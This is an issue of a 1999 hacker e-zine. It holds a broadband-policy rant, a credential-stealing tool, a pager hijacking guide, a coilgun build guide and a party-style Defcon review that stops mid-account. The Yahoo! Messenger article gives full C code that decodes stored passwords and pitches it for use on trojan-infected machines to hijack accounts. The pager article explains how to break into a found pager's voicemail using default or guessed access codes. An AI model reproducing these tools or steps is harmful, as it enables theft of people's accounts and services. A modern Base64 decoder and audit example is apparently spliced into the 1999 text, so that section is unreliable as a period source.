a penguin palace publication

{ Dissident }
[08/99]

---------------------------------------------------------------------------
Disclaimer
---------------------------------------------------------------------------

"Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech or of the press; or of the right of the people peaceably to assemble, and to petition the Government for a redress of grievances"

Under the above Law set forth in the First Amendment To The Constitution Of The United States Of America, The Author releases this work into the public domain for INFORMATIONAL PURPOSES ONLY.

Some of the things mentioned in this issue may be illegal/immoral/dumb. So don't do anything or something. If you do something that you read in this 'zine, and you get caught/hurt/maimed/killed/pissed off/raped, it isn't our fault. We're not responsible for your stupidity.

Any similarities to persons living, dead, or living now but soon to be dead are totally intentional and are included with extreme malice and prejudice! We bloody hate you!

Dissident is written for educational purposes only. Kids, don't try this at home. This publication is protected by international copyright law. (c) 1999 Penguin Palace

With that said, we're not fucking responsible. Fnord.

---------------------------------------------------------------------------
Staff and Friends of DPP
---------------------------------------------------------------------------

Staff:

Editor-In-Chief: Hatredonalog [hoal@penguinpalace.com]
Co-Editor: Pinguino [pinguino@penguinpalace.com]
Co-Editor: Secret Squirrel [ssq@penguinpalace.com]
Head Writer: MMX_Killa [mmx@unibiz.net]

Staff Writer: Widge [nanlokd@yahoo.com]
Staff Writer: The ThinkTank [thinktank@penguinpalace.com]
Staff Writer: weev [weev@penguinpalace.com]

---------------------------------------------------------------------------
Table of Contents
---------------------------------------------------------------------------

Introduction ....................................................... hoal
Kill Virginia Congressmen .......................................... weev
Cracking Yahoo! Messenger Passwords ............................... Widge
TELUS Mobility; Panasonic EN-POWR Pager Exploit ............... The Clone
Coilguns! .......................................................... hoal
Defcon VII review. blurred edition. ............................. zhixel
LASERs - Theory and Safety .............................. Secret Squirrel
LASER Spirograph ........................................ Secret Squirrel

---------------------------------------------------------------------------
Introduction
Hoal [hatredonalog@hotmail.com]

Ok, this is the last issue of Dissident. I don't know if someone else will continue it, but others have shown interest in taking my place, and they are welcome to. What is this about, you ask? Well, I'm resigning. I have come to a point that I am unable to do this anymore. First, school is coming up again, and I can't really spend the time to solicit articles constantly, fight with the other staff members, proofread, edit, and have to fix weev's articles every month. However, I am not completely out of the scene, as I am taking a position as a staff writer at the Phone Punx Magazine (http://fly.to/ppn), which seems to be more of what I've been looking for.

Hasta.

---------------------------------------------------------------------------
Kill Virginia Congressmen
weev [auer@vaix.net]

I'm sad to say, but the congressmen from Virginia, my state, are pushing bills that will degrade internet quality. These bills are extremely likely to become law. The government says it doesn't pick winners, it just monitors business actions, but in the end, the congressmen sitting on their money laundering asses in Washington are filling their pockets at the expense of the overall quality of the internet.

The FCC has been extremely cautious in defining the bandwidth limits of the word "broadband". They started the definition at 200kbits/sec. Now, bandwidth demand has pushed that definition up to a few megabits per second. It really has been perfectly defined by user needs.
But Bob Goodlatte (R) and Rick Boucher (D) are pushing two new bills, HR 1685, the "Internet Growth and Development Act of 1999," and HR 1686, the "Internet Freedom Act", that will redefine the FCC's carefully planned definition of broadband. For once, I'm with the FCC. What this will do is take the definition of broadband back down to 200kbits/sec. And that's actually worse than the original definition. The FCC's old standard was 200kbits/sec dual stream, up and downstream. This definition only requires that one channel be above 200kbits/sec. That means your friendly local telco can force in some asymmetric HDSL stuff that's 200kbits a second upstream, but the speed of a 9600 modem downstream, and call it broadband. And, oh yes, once they make the bill law, that will solidify that definition, and nothing can change it back except the implementation of a new law.

This makes me sick. The government is giving a monopoly to DSL providers, like GTE and USWest, and cursing alternatives. The bill will take years to change if it becomes law. DSL will probably need to be replaced by fiber in five years anyway. So bribing two Virginia congressmen is their way of ensuring victory for DSL, and being able to push second rate crap on people, and not have to install a new network of fiber, which saves the telcos a couple billion.

Let's run through Boucher's description of the bill:

"Telephone companies will be required to file plans with state public service commissions for the deployment of DSL services in all local exchanges where the deployment is both technologically feasible and economically reasonable. Today, only 50,000 subscribers nationwide have DSL service. Our legislation will result in those numbers increasing dramatically.... We also seek to encourage competition in the provision of DSL services by reducing the regulatory burden of DSL for telephone companies which agree to make reconditioned loops for the provision of DSL services available in a timely fashion with competitors."

Sadly, this description is quite true. Here's what's going to happen. They aren't going to make any more backbones. There won't be any more economic incentive to, since they've got the government keeping the FCC off their backs. They're going to trick thousands of small communities into wasting their tax money on this brand new shiny broadband, and then not give it to them, because it's going to be a one channel 200kbit/sec speed and then the other side is going to be as slow as a fucking 28.8 modem. Any new backbones they need to keep themselves from overloading, or dropping below the required 200kbit/sec limit, are going to be 40% vdsl. And they're going to divide it into clusters, having a bunch of VDSL networks chained together. Server-to-server load time will explode. And for all you IRC kiddies, networks will be split into clusters because of the load times.

What can YOU do to stop this from happening? Write your local congressman. If you're near DC, you can attempt to get a speaking spot at the hearing of the bills, like I am. If you can think of any other ways to do it, then carry them out. Whatever you can do, keep these bills from becoming law.

---------------------------------------------------------------------------
Cracking Yahoo! Messenger Passwords
Widge [nanlokd@yahoo.com]

(introduction)

For some reason or another, instant messaging has become very popular recently, with the likes of AOL, Microsoft, and Yahoo! all releasing their own crappy versions. There is, of course, a lot of arguing over the messaging protocols right now, but that is not important. All we care about is that Yahoo! has a fairly simple passwording scheme to crack. So simple that any common man (or woman) who walks upright could easily crack it in his or her head. But for the sake of the people who don't care to use their brain every once in a while, I have coded a neat little (actually it is big and clumsy - just look at the code) program that will crack a Yahoo! Messenger password that you throw at it.

(the scheme)

When some loser signs on to Yahoo! Messenger and toggles the "remember password" box, an encrypted value is stored in the registry. Just go to HKEY_CURRENT_USER/Software/Yahoo/Messenger/YahooPassword! and you will see it. When a password is stored in the registry, it is broken up into chunks of three characters which are then encrypted into four character chunks. So, if "abcdefgh" is our password, it would be broken down into "abc", "def", and "gh" which would then be encrypted. In the registry, it would look like this: "YWJjZGVmZ2h=". YWJj == abc, ZGVm == def, and Z2h == gh. A single character will look like this in the registry: "Yw==". Don't worry about the equal signs, they are just padding.

The first two characters of an encrypted chunk correspond to the first cleartext character, the third encrypted to the second clear, and the fourth encrypted to the third clear. The encryption algorithm (if it can be called that) contains nothing mathematical. It is, at best, a semi-complex puzzle. Anyway, if you really care to figure out just how this encryption is implemented, look at the source code. But you'll have to know C to understand it, and I'm not guaranteeing that you will be able to understand my code. Bear in mind, I am not a very good programmer.

(what the hell is it good for?)

To most people, probably nothing. But maybe to those types that use Back Orifice or NetBus or whatever else is out there, you just might find a use for this. Say, for instance, you "hax0red" your way onto some computer using some stupid Trojan horse. If they have Yahoo! Messenger, you can open up their registry and steal their username and password. Using Yahoo! Messenger, I believe you can read their e-mail or you can just be 'l33t and masquerade as them. But, if that is too juvenile for you, you can check out their stock portfolios and take advantage of our bull market. Regardless of how you use it, you're being a little bastard.

(compiling and running)

To compile the code, simply type:

    gcc yahoo.c

or use whatever damn compiler you have got. It should compile on just about everything as long as it is ANSI compliant. However, when I tried to compile it on Microsoft Developer Studio Standard (ver 4.0) and Borland Turbo C (1988 version I believe - might be 2.something), it didn't quite compile. But you will be safe if you use gcc, just don't use any Microsoft or Borland products.

To run the program, type:

    a.out <password>

where <password> is obviously an encrypted password, and a.out is whatever the program name is. Here is a sample run of the program, included here to take up space:

    hackme:~% a.out YWJjZGVmZ2hpamtsbW5v
    abcdefghijklmno

Now let's look at what happens when this runs. First, it will take the first block of four characters, "YWJj". "YWJj" is an encrypted "abc". "YW" will go through first() and put "YQ" in fst[]. f_de() will then be called, which will look for "YQ" in one of the f_* arrays. When (if) it finds "YQ", it will display the cleartext. Then "J" goes through second(). Here, "J" is turned into "I" and the program looks through s_letter[]. If it finds a match, it displays the cleartext. Finally, "j" goes through third(). All it does is go through the l_* arrays looking for a match. If it finds one, it displays the cleartext. This process repeats until the decryption is finished.

(disclaimer)

I really do not care how you use this program. If you want to steal my code and put your name on it, feel free to do so, I don't even care anymore.
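The three-into-four chunking, the "=" padding and every sample value in the article match standard Base64, so the stored registry value is a reversible encoding rather than encryption. The decoder below is an added example, not Widge's yahoo.c; the names b64_decode and stored_value_is_plain_b64 are assumptions made for illustration, and leftover bits are discarded so the article's "YWJjZGVmZ2h=" sample is accepted as written.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Map one Base64 alphabet character to its 6-bit value, or -1 if invalid. */
static int b64_value(char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode `in` into `out` (capacity `cap`, NUL-terminated on success).
   Returns the number of decoded bytes, or -1 on malformed input or
   when `out` is too small. */
int b64_decode(const char *in, char *out, size_t cap)
{
    size_t n = strlen(in), i, o = 0;
    unsigned int acc = 0;   /* bit accumulator */
    int bits = 0;           /* number of valid bits held in acc */

    if (cap == 0) return -1;
    /* strip at most two trailing '=' padding characters */
    for (i = 0; i < 2 && n > 0 && in[n - 1] == '='; i++) n--;
    if (n % 4 == 1) return -1;  /* one leftover symbol cannot hold a byte */

    for (i = 0; i < n; i++) {
        int v = b64_value(in[i]);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned int)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (o + 1 >= cap) return -1;     /* keep room for the NUL */
            out[o++] = (char)((acc >> bits) & 0xFFu);
            acc &= (1u << bits) - 1u;        /* keep only the unread bits */
        }
    }
    /* 2 or 4 leftover bits are dropped, so a non-canonical final symbol
       ("Z2h=" instead of "Z2g=") still decodes to the same bytes */
    out[o] = '\0';
    return (int)o;
}

/* Audit heuristic: 1 when a stored value decodes cleanly to printable
   ASCII, i.e. the "protected" secret is only encoded, not encrypted. */
int stored_value_is_plain_b64(const char *stored)
{
    char buf[256];
    int n = b64_decode(stored, buf, sizeof buf), i;

    if (n <= 0) return 0;
    for (i = 0; i < n; i++)
        if (!isprint((unsigned char)buf[i])) return 0;
    return 1;
}

int main(void)
{
    /* the three sample values quoted in the article */
    const char *samples[] = { "YWJjZGVmZ2hpamtsbW5v", "YWJjZGVmZ2h=", "Yw==" };
    char buf[64];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        if (b64_decode(samples[i], buf, sizeof buf) >= 0)
            printf("%-22s -> %s (reversible: %d)\n", samples[i], buf,
                   stored_value_is_plain_b64(samples[i]));
    return 0;
}
```

A credential store that passes this check offers no confidentiality against anyone who can read the value.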
/* yahoo.c - coded sometime at the end of july and into august a bit
   coded by widge - nanlokd@yahoo.com - please note that all of these
   variable names are fucked up and the code could be written much more
   clearly, i apologize to anyone trying to read the code */

#include <stdio.h>
#include <stdlib.h>   /* malloc(), exit() */
#include <string.h>   /* strcpy(), strlen(), strcmp() */
#include <strings.h>  /* bzero() */
#include <ctype.h>    /* isdigit() */

/* f_lcase contains encrypted characters for the first lowercase
   character of a password */
char *f_lcase[] = { "YQ", "Yg", "Yw", "ZA", "ZQ", "Zg", "Zw", "aA", "aQ",
                    "ag", "aw", "bA", "bQ", "bg", "bw", "cA", "cQ", "cg",
                    "cw", "dA", "dQ", "dg", "dw", "eA", "eQ", "eg" };

/* f_ucase contains encrypted characters for the first uppercase
   character of a password */
char *f_ucase[] = { "QQ", "Qg", "Qw", "RA", "RQ", "Rg", "Rw", "SA", "SQ",
                    "Sg", "Sw", "TA", "TQ", "Tg", "Tw", "UA", "UQ", "Ug",
                    "Uw", "VA", "VQ", "Vg", "Vw", "WA", "WQ", "Wg" };

/* f_num contains encrypted characters for the first numeral of a
   password */
char *f_num[] = { "MA", "MQ", "Mg", "Mw", "NA", "NQ", "Ng", "Nw", "OA",
                  "OQ" };

/* s_letter contains the encrypted characters for the second character
   of a password */
char s_letter[] = "AEIMQUYcgkows048AEIMQUYcgko";

/* l_lcase contains the encrypted characters for the third lowercase
   character of a password */
char l_lcase[] = "hijklmnopqrstuvwxyz012345";

/* l_ucase contains the encrypted characters for the third uppercase
   character of a password */
char l_ucase[] = "BCDEFGHIJKLMNOPQRSTUVWXYZ";

/* l_num contains the encrypted characters for the third numeral of a
   password */
char l_num[] = "wxyz012345";

/* crypt is the encrypted password, l_al is the lowercase letters of the
   english alphabet, u_al is the uppercase letters of the english
   alphabet, fst holds the characters for the first character of a chunk
   (plus a terminating NUL so strcmp() can be used on it), mov holds how
   many spaces were moved (explained later), len is the length of the
   password, sec holds the second character of the password, ctl does
   something, so do x and y, ck is explained later. */
char *crypt, l_al[26], u_al[26], fst[3];
int mov, len, sec, ctl, x, y, ck = 0, num[10];

void first( void );   /* fills up fst[] to be decrypted */
void f_de( void );    /* decrypts fst[] to get the first character */
void second( void );  /* decrypts the second character */
void third( void );   /* decrypts the third character */

int main(int argc, char **argv)
{
    if( argc < 2 ) {
        printf("Usage: %s <password>\n", argv[0]);
        exit(1);
    }

    /* pretty obvious: copy the argument, leaving room for the NUL */
    crypt = (char *)malloc(strlen(argv[1]) + 1);
    if( crypt == NULL )
        exit(1);
    strcpy(crypt, argv[1]);
    len = strlen(crypt);

    /* filling up the alphabet and numerals */
    for(y = 0, ctl = 97; ctl < 123; ctl++)
        l_al[y++] = ctl;
    for(y = 0, ctl = 65; ctl < 91; ctl++)
        u_al[y++] = ctl;
    for(ctl = 0; ctl < 10; ctl++)
        num[ctl] = ctl;

    /* this is for passwords that are into neat little chunks. that is,
       when you look in the registry, there will be no equal signs */
    if( len % 4 == 0 ) {
        for(x = 1; x < len; x += 4) {
            first();
            second();
            third();
        }
        printf("\n");
    }

    /* this is for passwords with two equal signs */
    if( len % 4 == 2 ) {
        for(x = 1; x < len - 1; x += 4) {
            first();
            second();
            third();
        }
        x = len - 1;
        /* we can't just call first() because it is stored differently
           when it is single. it will be stored as it appears in the f_*
           arrays */
        fst[0] = crypt[len-2];
        fst[1] = crypt[len-1];
        f_de();
        printf("\n");
    }

    /* and one equal sign */
    if( len % 4 == 3 ) {
        for(x = 1; x < len - 2; x += 4) {
            first();
            second();
            third();
        }
        first();
        second();
        printf("\n");
    }

    return 0;
}

void first( void )
{
    int b = 0, pos = 7;

    bzero(fst, sizeof(fst));

    /* this takes care of numerals. for instance, if we have b2, we have
       to take it back towards the lowercase end of the alphabet. so we
       add an amount to take it to 'z' on the ascii chart. */
    if( isdigit((unsigned char)crypt[x]) )
        switch( crypt[x] ) {
            case '0': { crypt[x] += 74; b = 1; break; }
            case '1': { crypt[x] += 73; b = 2; break; }
            case '2': { crypt[x] += 72; b = 3; break; }
            case '3': { crypt[x] += 71; b = 4; break; }
        }

    /* this sees how much we have to move our character backwards to get
       to an 'A', 'Q', 'g', or 'w'. if you look at the f_* arrays of
       characters, you will see that they all end in one of those
       letters. we need to know how much mov is for the second
       character */
    for(mov = pos; mov > 2; mov--) {
        switch(crypt[x] - mov) {
            case 'A': { fst[1] = 'A'; break; }
            case 'Q': { fst[1] = 'Q'; break; }
            case 'g': { fst[1] = 'g'; break; }
            case 'w': { fst[1] = 'w'; break; }
            default: continue;
        }
        if( fst[1] )
            break;
    }

    /* looking back up to the numerals, we add b to mov so we know how
       much we moved back a numeral */
    if( b )
        mov += b;

    fst[0] = crypt[x-1];
    f_de();
}

void f_de( void )
{
    int a;

    /* this big, ugly switch statement figures out the cleartext
       character. Y,Z,a,b,c,d, and e are for lowercase, Q,R,S,T,U,V, and
       W are for uppercase, and M,N, and O are for numerals. you can see
       that in the variable declarations. i had to make it a big switch
       statement, because any other way would make everything go crazy. */
    switch( fst[0] ) {
        case 'Y': case 'Z': case 'a': case 'b':
        case 'c': case 'd': case 'e': {
            /* the f_* letter tables hold 26 entries each */
            for(a = 0; a < 26; a++)
                if( (strcmp(fst, f_lcase[a])) == 0 )
                    printf("%c", l_al[a]);
            break;
        }
        case 'Q': case 'R': case 'S': case 'T':
        case 'U': case 'V': case 'W': {
            for(a = 0; a < 26; a++)
                if( (strcmp(fst, f_ucase[a])) == 0 )
                    printf("%c", u_al[a]);
            break;
        }
        case 'M': case 'N': case 'O': {
            for(a = 0; a < 10; a++)
                if( (strcmp(fst, f_num[a])) == 0 )
                    printf("%d", num[a]);
            break;
        }
        default:
            break;
    }

    bzero(fst, sizeof(fst));
}

void second( void )
{
    int b;

    sec = 0, ck = 0;

    /* if we moved back 4 or 6 spaces, we only want to look at the first
       17 characters. what we do is take the encrypted character and
       move it down one letter, and compare it to the characters in
       s_letter[]. if it matches, we take the b from the for loop and
       subtract it one or two and make that number sec. from this we
       just plop it in a_* or num and get our cleartext character */
    if( mov == 4 || mov == 6 ) {
        for(b = 0; b < 17; b++)
            if( crypt[x+1] - 1 == s_letter[b] ) {
                /* this thing is just fucked up */
                if( b > 10 && b < 13 )
                    sec = b - 2;
                else
                    sec = b - 1;
            }

        /* this is used if the third character is a numeral or for some
           other odd occasions */
        if( !sec )
            for(b = 0; b < 17; b++)
                if( crypt[x+1] == s_letter[b] ) {
                    if( b > 10 && b < 13 )
                        sec = b;
                    else
                        sec = b - 1;
                    ck = 1;
                }
    }

    /* if we moved back 5 or 7 spaces, we only want to look at the last
       characters from 17 up. the same crap applies here as did above */
    if( mov == 5 || mov == 7 ) {
        for(b = 17; b < sizeof(s_letter); b++)
            if( crypt[x+1] - 1 == s_letter[b] )
                sec = b - 1;

        if( !sec )
            for(b = 17; b < sizeof(s_letter); b++)
                if( crypt[x+1] == s_letter[b] ) {
                    ck = 1;
                    sec = b - 1;
                }
    }

    /* if we moved back 3 spaces, it is a numeral */
    if( mov == 3 ) {
        for(b = 0; b < 10; b++) {
            if( crypt[x+1] - 1 == s_letter[b] ) {
                sec = b;
                printf("%d", num[sec]);
            }
        }

        if( !sec )
            for(b = 0; b < 10; b++)
                if( crypt[x+1] == s_letter[b] ) {
                    ck = 1;
                    sec = b;
                    printf("%d", num[sec]);
                }
    }

    /* if we moved back over 5 spaces, we have a lowercase character */
    if( mov > 5 )
        printf("%c", l_al[sec]);

    /* if we moved back 4 or 5 spaces, we have an uppercase character */
    if( mov == 4 || mov == 5 )
        printf("%c", u_al[sec]);
}

void third( void )
{
    int b;

    /* here, we are taking the last encrypted character and comparing it
       with the l_* arrays without mucking around with anything. i think
       this section is pretty self explanatory. the l_lcase and l_ucase
       tables hold 25 characters each, so the loops stop there. */
    if( !ck ) {
        for(b = 0; b < 25; b++) {
            if( crypt[x+2] == l_lcase[b] ) {
                printf("%c", l_al[b]);
                return;
            }
            if( crypt[x+2] == l_ucase[b] ) {
                printf("%c", u_al[b]);
                return;
            }
        }
    }

    /* this is for numbers or other odd things */
    if( ck ) {
        for(b = 0; b < 10; b++)
            if( crypt[x+2] == l_num[b] ) {
                printf("%d", num[b]);
                return;
            }

        for(b = 0; b < 25; b++) {
            if( crypt[x+2] == l_lcase[b] ) {
                printf("%c", l_al[b]);
                return;
            }
            if( crypt[x+2] == l_ucase[b] ) {
                printf("%c", u_al[b]);
                return;
            }
        }
    }
}

---------------------------------------------------------------------------
TELUS Mobility; Panasonic EN-POWR numeric pager exploit
The Clone [theclone@edmc.net]

Telus Mobility offers its customers a few types of paging services. One type is called 'EN-POWR numeric pager'. With the EN-POWR numeric pager, you get total FLEX coverage. In other words, you get coverage all across Alberta. The Panasonic EN-POWR pre-paid numeric pager is only $99.95, and it comes with 6 months of enhanced service with a limited but nifty selection of assorted colors to choose from.

"But Clone, I have three kids to feed. I can't afford this type of service!"

It's completely understandable. That is why I wrote this file. To show you how to get service that *should* be dirt cheap for absolutely free.

Let's say that one day you were walking down the street minding your own business, picking flowers, waving to Telus employees as they drive past in their goodie-vans, when you trip over a pager that has the word 'Panasonic' labeled on the top. This semi-transparent device, with its groovy design, is the only thing stopping you from suing Telus for leaving its property laying around. Then you remember that it's an EN-POWR pre-paid numeric pager and it has to be property of someone. "Hmm..." you think.
At this point you can do one of two things: you can call Telus reporting a missing pager, or you can try to use your wits to find a way to exploit this. First let's take a look at the pager features:

Pager features
--------------

· saves 23 messages
· message time stamp
· built in alarm clock
· silent vibration or audible alert
· low battery alert
· shows date and time of day
· selective erase/erase all
· locks important messages
· uses only one AAA battery
· FLEX technology gives you up to four months battery life
· duplicate message indicator
· reminder alert
· back-lit display
· automatic on/off

'Saves 23 messages', thought of anything yet? ;) Sure you have, my analytical friend. Along with the numeric paging option, you also get a voice-mail paging option which requires you to dial the number the pager is subscribed to.

So you think "How am I going to get this pager number?"
------------------------------------------

One easy way is to wait for someone to page you. Usually friends of the pager customer don't know the pager is in the wrong hands, so they unknowingly send them a voice-message. Bad idea. The minute they send that message, the data is sent to the Telus Mobility switch, and straight to the pager itself. What is displayed? The pager number, silly! (note: if a numeric page is sent, the numbers displayed on the screen are whatever the person who sent it typed.)

The next step is easy: you call the number. The next thing you'll hear is one of two things: 1. the customer's message, 2. Telus' default message. By simply pressing '0' on the keypad, you'll next be prompted by an automated voice saying: "Please enter your access code".

"How do I acquire the access code?"
--------------------------------

If the customer was stupid enough to set the default access code, all you do is look on the back of the EN-POWR numeric pager, and search for the "capcode". The capcode is the series of numbers at the bottom of the label, below the Model, Serial Number, Country Code, and ISC code. It's easily distinguishable by the letter E and a 7 digit code after it. An example of a capcode is 'E1230948'. The default access code is the last 4 digits of the capcode. 0948 would be the access code for this pager. Now enter 0948. If you're lucky you'll get the main menu. My suggestion to you is to change the access code as soon as possible.

If you're not so lucky, try guessing defaults. 1234, 1111, 1999, 2000, etc. Until you come across the correct access code. If you're still having trouble, try selling the pager to some moronic 14 year old who just wants to look cool in front of his sleazy 14 year old girlfriends.

Final words
-----------

Now that I've given you step by step instructions on how to exploit the EN-POWR pre-paid pager, I hope that you've learned a little bit about how it works. In the next few months I can see the news talking about hundreds/thousands of Telus pagers going missing and then used for the thieves' evil purposes. I'll sleep well at night knowing I was the one responsible.

THE END

written by: The Clone
June 22, 1999

Contact info
----
E-mail: theclone@edmc.net
URL: Nettwerked - http://nettwerk.hypermart.net
Voice Mail: So-Soft Corporation - 1-800-494-9831; box 407

---------------------------------------------------------------------------
Coilguns!
hoal [hatredonalog@hotmail.com]

"A Coilgun is a tube surrounded by Super conducting electromagnetic coils. It can be used to launch (SHOCK HARDENED CARGO) to LEO at extremely high accelerations. Coilguns with barrel lengths of less than 1,000 miles are impractical for live or fragile cargo due to accelerations of extreme magnitude (100s-1,000s of times the force of earth normal gravity)."
- The Electro-Magnetic Propulsion Homepage; http://www.sover.net/~geoffk/railgun.html

Ok.. well, this article won't cover building anything that fantastic or large or powerful. It will go over the ideas behind an EMP device, and how to possibly build one (which I am currently in the process thereof.)

Part One: Barrel

Ok, the barrel is THE most important part of the device itself. You have many choices when it comes to this part: how many coils, how many turns per coil, barrel length, materials, etc.

Now, how many coils is your gun going to use... I would go with three. The first 3-4 coils provide the most acceleration, the rest are slightly incremental afterwards, although that does not mean that they don't help. Consider this: YOU are going to have to wrap these coils by hand, so you may want to keep the number of coils down. So, you'll want 4-5 coils in total, which may still be a bit of work, but not a big deal.

How many turns should you make it? The more the better, but there is a limit at which the resistance will be too high, and the wires will melt after one shot. A quick fix for this is using thicker wire, and/or try to use Class H wire which can sustain up to 365F. Check out http://www.wiretron.com/magnet.html to figure out what wire is the right one for your application. The higher the amount of current that is going to be flowing through the coils, the higher class of insulation you need. Ok, now that you spent the time reading all of that, buy the highest rated stuff you can at your local electronics distributor. Make some nice fat coils, but read on to find out how fat to make them.

The EMP homepage recommends that the barrel be evacuated, or made into a complete vacuum. Ok, so that's not too realistic... scratch it. You won't be getting enough acceleration to make air drag a REAL problem. One source says to use a regular barrel, with a .258in. bore with 18in. for length. Now, remember, 18 inches is 1 1/2 feet, so the coils will want to be mounted at the rear.

18 in. barrel.

  xxx xxx xxxx xxx xxx xxxx
  ----------------------------------------------
   *
  ----------------------------------------------
  xxx xxx xxxx xxx xxx xxxx

Ok, now you have the barrel designed, and there is one more thing you may want to think of: External Metal. By sliding the barrel with the coils around it into an iron pipe, you can add to the magnetic flux, and thus more power. Figure out the diameter of the inside of the iron pipe, and that's how fat your coils should be. The accompanied action is to add iron to the ends (not covering the barrel end.) The only problem with this is that it could cause your coils to overheat and melt.

  ||==============================================||
  ||xxx xxx xxxx xxx xxx xxxx                     ||
  ||----------------------------------------------||
  || *
  ||----------------------------------------------||
  ||xxx xxx xxxx xxx xxx xxxx                     ||
  ||==============================================||

Ok, that is it for the barrel design.. you should have an idea of how to play with it a bit. Use the one that is within your price range and/or capabilities. A schematic for such things is available at: http://www.geocities.com/Heartland/Prairie/7745/Images/JPEG/RailGunCoils.jpg

Part Three: Power Source

Next, you're going to need a power supply of some sort. Here are some rough specifications for what you need.. it's got to be high voltage, high amperage, and quick. How will you accomplish that?

The first way would be to have a timer circuit (you'll need one anyway.) You'll need something that won't melt your coils, and will provide the most power. You'll need to know what ohm your coils are rated at, along with the maximum voltage of any other components that are on that side of the electronics. Now, you should figure out how many AMPS you'll be consuming by firing one coil.. this is found by using Ohm's law. I = V/R : Output Amperage = Voltage Supplied/Coil Resistance. After that, you'll have to know how often you'll need a pulse to fire a coil, and so on. Some good specs on power supplies for this job can be found at http://www.oz.net/~jjhansen/coilgun/mark1/powersupply.htm

Another way to power your Coilgun would be to use a fantastically dangerous capacitor bank that could kill you, your family, and most of your neighborhood's wildlife in one good shock. Anyway, to say the least, you'll need to use higher AWG wire for it, so the coils won't melt, but the plus side is, you can make the projectile shoot a HELL OF A LOT FASTER. To do this, you would probably need to use a wall socket, which carries about 115vAC. 115 is not a good number, so you'll probably need to lower it down to a reasonable voltage using a variac, and then raise it up with a transformer of some sort. Throw a bridge rectifier in to filter out the AC (wouldn't be good for your capacitor bank.) Follow the bridge rectifier with a resistor of appropriate value, and you're set. Oh, it should all be put in a serial fashion, as so:

  ----|variac|---|trans-|---| bridge  |---|cap.|----|coil
  ----|      |---|former|---|rectifier|---|bank|-\ -|gun
                              resistor-^     switch-^

That should get you all fuzzy, and supply you with a bit of juice, but you should probably keep it low (around 30-40v) as you may need several pulses.

Timing: You will need a 555 timer to get a base time for another crucial part, the coil timer, which is configured to fire each coil at a specified time (each projectile will need to be similar in size/weight.) You'll also need a coil driver, mostly to protect the rest of your equipment. Such designs and ideas can be found at:

http://www.oz.net/~jjhansen/coilgun/mark1/oscillator.htm
http://www.oz.net/~jjhansen/coilgun/mark1/coiltimer.htm
http://www.oz.net/~jjhansen/coilgun/mark1/coildriver.htm
http://www.oz.net/~jjhansen/coilgun/mark1/coiltimer.htm
http://www.geocities.com/Heartland/Prairie/7745/Images/JPEG/RailGunMainCircuit.jpg

This is all for open-loop design, which expects the projectile to be the same every time (no detection,) as it fires each coil at a specified time whether there is a projectile near or not.

http://www.oz.net/~jjhansen/coilgun/mark1/spread1.htm
http://www.oz.net/~jjhansen/coilgun/mark1/spread2.htm
http://www.oz.net/~jjhansen/coilgun/mark1/spread3.htm

Conclusion:

They're big. They're bad. They're expensive. They are really cool. They can be dangerous, expensive and take a lot of time to make, but the upside is, you can make them look like large penii. Heh, but if you made a large enough one, with good aiming, you may be able to annihilate small animals in your backyard with high speed drywall screws. Oh, the endless possibilities. Anyway, here, at the end, are all the links mentioned in the article again, for good measure, along with a few others.
http://www.sover.net/~geoffk/railgun.html
http://www.geocities.com/Heartland/Prairie/7745/Images/JPEG/RailGunCoils.jpg
http://www.oz.net/~jjhansen/coilgun/mark1/powersupply.htm
http://www.oz.net/~jjhansen/coilgun/mark1/oscillator.htm
http://www.oz.net/~jjhansen/coilgun/mark1/coiltimer.htm
http://www.oz.net/~jjhansen/coilgun/mark1/coildriver.htm
http://www.oz.net/~jjhansen/coilgun/mark1/coiltimer.htm
http://www.geocities.com/Heartland/Prairie/7745/Images/JPEG/RailGunMainCircuit.jpg
http://www.oz.net/~jjhansen/coilgun/mark1/spread1.htm
http://www.oz.net/~jjhansen/coilgun/mark1/spread2.htm
http://www.oz.net/~jjhansen/coilgun/mark1/spread3.htm
http://www.intap.net/~j/coilgun/index.shtml

And, if all of this confuses you, just go here:
http://www.iinc.com/~obwan/htc/technogy/s_craft/nailsh.htm

───────────────────────────────────────────────────────────────────────────
───────────────────────────────────────────────────────────────────────────

Defcon VII review. blurred edition.
zhixel [no-email provided]

after arriving at the Las Vegas airport, I generally stood around and waited for my ride to pick me up.. thirty minutes later I got tired of waiting and managed to take a shuttle to the Alexis park.. and within five minutes ran directly into teklord (who's kind of hard NOT to run into, in the first place. :D ) I followed teklord around for part of the night, along with some green braided girl who went by "illuminati" or something. (I'd continue to bump into and greet her for the rest of the con) I ended up running back to the hotel lobby, buying an overpriced jolt and happening onto barkode (my ride) and some redheaded guy called "Erik" (which took five seconds for me to realize THAT was Felix.) I yelled at barkode and shoved my backpack at him, which promptly identified myself as "zhixel", and listened to his story about trying to find me at the airport.
From there on we ended up going back to his room, and spending the rest of the early morning partying at some other room. It wasn't until 5 something that I ended up trying to sleep on the couch back at our room.

Friday. wake up, prepare for the day and run off with Barkode to get our badges & etc. We manage to track down pinguino (who takes a whole five minutes to realize who I am and tackle me) and who I find out later to be secret squirrel. I follow pinguino around, talk to the goons about setting up the penguin palace table and end up helping drag stuff in as well. We also went back to pinguino's room where I borrowed my design consulting skills to the penguin palace sign, along with running from ping. the rest of the day was pretty much a blur. later afternoon I caught Barkode & skrike and went back to our room, meeting logicbox & monkeygrl at the 3rd pool along the way. I went up and "introduced" myself to both logic and monkey (which mostly involved my smacking them in the head with my new T-shirt). We went back to our room and talked it up. I showed off my cow as well. later a lot of various people showed up at the room and we ordered Chinese food.. and many proceeded to get rather drunk. some guy by 'runt' showed up later.. and continued to get amazingly fucked up, spew all over barkode's bed, and pass out and get dragged out and later taken to the hospital .. fun. I followed several people around, including Felix, before returning to the room, watching TV, talking to the cleanup service. barkode & prophet & signine showed back up at various times and we all slept. I don't quite remember how I slept, but needless to say it was uncomfortable. I think I gave up and took barkode's bed before he came back and I stole his sheet and took the floor. unsure. perhaps that was Saturday night.

